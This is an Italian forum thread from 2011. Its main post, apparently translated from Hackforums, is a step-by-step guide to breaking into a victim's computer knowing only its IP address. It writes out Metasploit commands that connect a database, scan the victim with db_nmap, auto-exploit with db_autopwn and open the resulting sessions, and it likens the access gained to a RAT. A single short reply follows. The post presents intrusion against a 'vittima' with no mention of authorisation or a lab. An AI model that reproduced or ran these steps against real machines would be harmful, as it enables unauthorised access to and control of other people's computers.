Hackerare Pc Solo Sapendo Ip Della Vittima...

« Older   Newer »
 
  Share  
.
  1. ~TrAzXoo
        Like  
     
    .

    User deleted


    Ciao a tutti. Questa e una guida che vi aiutera a hack un computer solo sapendo il suo IP.
    Tools che useremo:
    1)Metasploit ( http://metasploit.com/ )
    2)PostgrSQL per il vostro database ( www.postgresql.org/ )

    Dopo avere scaricato, installate questi programmi e trovate un IP per hack.

    1. Dopo avere installato le programmi, apri PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). E poi clicca con il tasto destra nel vostro server (nel parte sinistra del programma) e cliccate connect. Ricordatevi di tenere questra finestra aprita. Dovete anche impostare il vostro password nel step 3.

    2. Ora per hack! Vai a start -> all programs -> Metasploit Framework, e poi apri Metasploit. Lasciala aprire fino a quando vedete una cosa simile:


    3. Ora nella finestra scrivete:
    HTML
    db_connect postgres:IlVostroPassword@LocalHost:5432


    (La prima volta che farete questa, il screen flashera un paio di volte).
    4. Scrivete db_host per controllare se siete connetatti o no.
    5. Ora scrivete questo, ma invece di 000.000.000.000 scrivete il IP della vittima:
    HTML
    db_nmap 000.000.000.000


    6. Ora faremmo fun! E il tempo per automatic exploitation. Solo scrivete db_autopwn -t -p -e -s -b, vedete il programma che inizia a auto-exploit e poi vai a giocare un po e poi vedi il Metasploit che cosa sta succedendo.

    7. Dopo il auto-exploitation, scrivete sessions -l per vedere cossa ha scannato il programma, e per anche vedere le esploit! Se e fatta bene, dovete vedere un sacco di esploit.

    8. Ora vi useremo le esploit per hack il computer. Se noterete, tutti li esploit hanno un numero e anche dei nomi (esempio., reverseScreen_tcp). Per usare il esploit dovette scrivere:
    Codice:
    HTML
    sessions -i NumeroDelExploit


    9. La Guida è Pronta!

    --------------------------
    Le funzioni di metasploit, sono come un RAT. Se sei collegato con il PC, puo farli tutto!

    Grazie.

    Fonte:
    SPOILER (click to view)
    Hackforums.net

    Traduzioni Mie.
     
    .
  2. iBlackStar
        Like  
     
    .

    User deleted


    non ho capito niente anche se mi piacerebbe capire .... scusa la mia ignoranza =(
     
    .
1 replies since 2/3/2011, 13:53   693 views
  Share  
.